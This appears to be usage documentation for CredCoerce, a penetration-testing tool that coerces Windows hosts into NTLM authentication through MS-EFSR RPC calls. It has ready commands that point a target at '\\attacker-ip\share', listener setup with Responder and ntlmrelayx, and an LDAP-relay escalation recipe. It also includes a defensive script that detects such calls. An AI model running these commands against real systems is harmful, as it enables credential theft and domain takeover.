CredCoerce sends RPC calls to a target Windows system that cause it to initiate an outbound authentication attempt to a path you control. You capture or relay the resulting credentials with a listener such as Responder or ntlmrelayx. This technique is commonly used in internal penetration tests to move laterally or escalate privileges.

Synopsis

CredCoerce [options] -Techniques <ComponentSelector[]> <ServerName> <VictimPath>

Parameters

ServerName (string, required)
    Hostname or IP address of the target system to coerce.
VictimPath (string, required)
    UNC path or resource path to embed in the RPC call. The target system will attempt to access this path, triggering an outbound authentication to the host in the path (e.g., \\attacker-ip\share).

Options

-Techniques <ComponentSelector[]> (required)
    One or more coercion techniques to attempt. Use * to try all available techniques. See the table below for all supported values.
-ConsoleOutputStyle (-OutputStyle) <string>
    Output format: Freeform, Raw, Table, List, Csv, Tsv, Json.
-SpnOverride <string>
    Override the SPN used during authentication.
-Socks5 <string>
    SOCKS5 proxy endpoint (host:port).

Coercion techniques

All available techniques use the MS-EFSR (Encrypting File System Remote) RPC interface.
Technique                          Interface   Description
*                                              Attempt all available techniques
Efs.OpenFile                       MS-EFSR     Call EfsRpcOpenFileRaw with the victim path
Efs.EncryptFile                    MS-EFSR     Call EfsRpcEncryptFileSrv with the victim path
Efs.DecryptFile                    MS-EFSR     Call EfsRpcDecryptFileSrv with the victim path
Efs.QueryUsersOnFile               MS-EFSR     Call EfsRpcQueryUsersOnFile with the victim path
Efs.QueryRecoveryAgents            MS-EFSR     Call EfsRpcQueryRecoveryAgents with the victim path
Efs.RemoveUsersFromFile            MS-EFSR     Call EfsRpcRemoveUsersFromFile with the victim path
Efs.AddUsersToFile                 MS-EFSR     Call EfsRpcAddUsersToFile with the victim path
Efs.FileKeyInfo                    MS-EFSR     Call EfsRpcFileKeyInfo with the victim path
Efs.DuplicateEncryptionInfoFile    MS-EFSR     Call EfsRpcDuplicateEncryptionInfoFile with the victim path
Efs.AddUsersToFileEx               MS-EFSR     Call EfsRpcAddUsersToFileEx with the victim path
Efs.FileKeyInfoEx                  MS-EFSR     Call EfsRpcFileKeyInfoEx with the victim path
Efs.GetEncryptedFileMetadata       MS-EFSR     Call EfsRpcGetEncryptedFileMetadata with the victim path
Efs.SetEncryptedFileMetadata       MS-EFSR     Call EfsRpcSetEncryptedFileMetadata with the victim path
Efs.EncryptFileExSrv               MS-EFSR     Call EfsRpcEncryptFileExSrv with the victim path
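Every method in the table above takes a file path that the server opens on the caller's behalf, which is why a UNC path in that argument is the tell-tale sign of coercion described at the top of this page. As an added example (not CredCoerce code and not part of the original page), the Python script below triages RPC call records from a hypothetical sensor export: the record fields (interface, method, file_name, client_ip, server), the allowlist of trusted file servers and the sample events are all constructed for illustration. It flags MS-EFSR file-path calls whose argument points at a host outside the allowlist or at a raw IP literal, and passes through ordinary EFS operations against approved file servers, so the signal is where the path points rather than the mere presence of an EFSRPC call.

```python
"""Triage MS-EFSR RPC call records for coercion-style UNC paths.

Added example. The record layout (interface, method, file_name, client_ip,
server) is a hypothetical sensor export constructed for illustration.
"""
import re
from ipaddress import ip_address

# File-path methods from the technique table. Each makes the server open the
# supplied path, so a UNC path here implies an outbound connection by the server.
EFSR_PATH_METHODS = {
    "EfsRpcOpenFileRaw", "EfsRpcEncryptFileSrv", "EfsRpcDecryptFileSrv",
    "EfsRpcQueryUsersOnFile", "EfsRpcQueryRecoveryAgents",
    "EfsRpcRemoveUsersFromFile", "EfsRpcAddUsersToFile", "EfsRpcFileKeyInfo",
    "EfsRpcDuplicateEncryptionInfoFile", "EfsRpcAddUsersToFileEx",
    "EfsRpcFileKeyInfoEx", "EfsRpcGetEncryptedFileMetadata",
    "EfsRpcSetEncryptedFileMetadata", "EfsRpcEncryptFileExSrv",
}

# Matches \\host\share\... or a bare \\host and captures the host component.
_UNC_HOST = re.compile(r"^\\\\([^\\]+)(?:\\|$)")

# Constructed allowlist: file servers that legitimately receive EFS traffic.
TRUSTED_FILE_SERVERS = {"lumon-fs1", "lumon-fs2"}


def unc_host(path):
    """Return the lower-cased host of a UNC path, or None for a local path."""
    m = _UNC_HOST.match(path or "")
    return m.group(1).lower() if m else None


def is_ip_literal(host):
    """True when the host component is a bare IPv4/IPv6 address."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def classify(record, trusted_hosts=TRUSTED_FILE_SERVERS):
    """Return (verdict, reason); verdict is 'ignore', 'ok' or 'alert'."""
    if record.get("interface") != "MS-EFSR" or record.get("method") not in EFSR_PATH_METHODS:
        return "ignore", "not an MS-EFSR file-path method"
    host = unc_host(record.get("file_name"))
    if host is None:
        return "ok", "local path, no outbound connection implied"
    if host in trusted_hosts:
        return "ok", f"UNC path to trusted file server {host}"
    if is_ip_literal(host):
        return "alert", f"{record['method']} with UNC path to raw IP {host}"
    return "alert", f"{record['method']} with UNC path to unknown host {host}"


def scan(records, trusted_hosts=TRUSTED_FILE_SERVERS):
    """Return the records that alert, each paired with the reason."""
    out = []
    for rec in records:
        verdict, reason = classify(rec, trusted_hosts)
        if verdict == "alert":
            out.append((rec, reason))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"client_ip": "10.66.0.50", "server": "LUMON-FS1", "interface": "MS-EFSR",
     "method": "EfsRpcOpenFileRaw", "file_name": "\\\\10.66.0.99\\share\\x"},
    {"client_ip": "10.66.0.50", "server": "LUMON-FS1", "interface": "MS-EFSR",
     "method": "EfsRpcEncryptFileSrv", "file_name": "\\\\unknown-box\\share\\x"},
    {"client_ip": "10.66.0.21", "server": "LUMON-FS1", "interface": "MS-EFSR",
     "method": "EfsRpcQueryUsersOnFile", "file_name": "\\\\LUMON-FS2\\home\\report.docx"},
    {"client_ip": "10.66.0.21", "server": "LUMON-FS1", "interface": "MS-EFSR",
     "method": "EfsRpcFileKeyInfo", "file_name": "C:\\Users\\irving\\notes.txt"},
    {"client_ip": "10.66.0.21", "server": "LUMON-FS1", "interface": "MS-SRVS",
     "method": "NetrShareEnum", "file_name": ""},
]

if __name__ == "__main__":
    for rec, reason in scan(SAMPLE_EVENTS):
        print(f"ALERT {rec['client_ip']} -> {rec['server']}: {reason}")
```

The telemetry source will differ between environments (RPC firewall logs, ETW, an EDR's RPC hooks); what carries over is the method set and the host check on the path argument. Keep the allowlist tight: a coercion path can name a hostname as easily as an IP, so the `unknown host` branch matters as much as the `raw IP` one.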

Authentication

-UserName (-u) <string>
    User name (without domain) to authenticate to the target with.
-UserDomain (-ud) <string>
    Domain of the authenticating user.
-Password (-p) <string>
    Password.
-NtlmHash <string>
    NTLM hash for pass-the-hash authentication.
-Anonymous <boolean>
    Use anonymous authentication.
-AesKey <string>
    AES-128 or AES-256 Kerberos session key.
-Tgt <string>
    TGT file path (.kirbi or ccache format).
-Kdc (-K) <string>
    KDC endpoint (host:port).
-S4UserName <string>
    User to impersonate via S4U2self.
-HostAddress (-ha) <string[]>
    Override network address(es) of the server.
-UseTcp6Only (-6) <boolean>
    Use TCP over IPv6 only.
-UseTcp4Only (-4) <boolean>
    Use TCP over IPv4 only.

Examples

1. Start a credential listener

On your attacker machine, start a listener to capture or relay credentials:

    # Using Responder (capture)
    responder -I eth0

    # Or using ntlmrelayx (relay)
    ntlmrelayx.py -t smb://target-ip

2. Coerce authentication with all EFS techniques

    CredCoerce -UserName milchick@LUMON -Password Br3@kr00m! -Techniques * LUMON-FS1 \\\\attacker-ip\\share

The target (LUMON-FS1) attempts to authenticate to \\attacker-ip\share, which your listener captures.

3. Try a specific technique

    CredCoerce -UserName milchick@LUMON -Password Br3@kr00m! -Techniques Efs.OpenFile LUMON-FS1 \\\\attacker-ip\\share

4. Authenticate to the target using Kerberos

    CredCoerce -Kdc 10.66.0.11 -AesKey <hex-aes-key> -Techniques * LUMON-FS1 \\\\attacker-ip\\share

Credential coercion triggers real outbound network connections from the target system. Ensure your engagement authorizes this activity and that you control the listener receiving the credentials.

Common usage patterns

Coerce a domain controller or privileged machine to authenticate to an LDAP relay, which can be used to add privileges:
  1. Start ntlmrelayx targeting LDAP on another domain controller.
  2. Run CredCoerce against the victim machine with a path pointing to your relay listener.
  3. The relay authenticates to LDAP on your behalf and performs the privileged operation.
When the target is a computer account (rather than a user), the outbound authentication uses the machine account credentials. These Net-NTLM hashes can be cracked offline or relayed to services that accept machine account authentication.
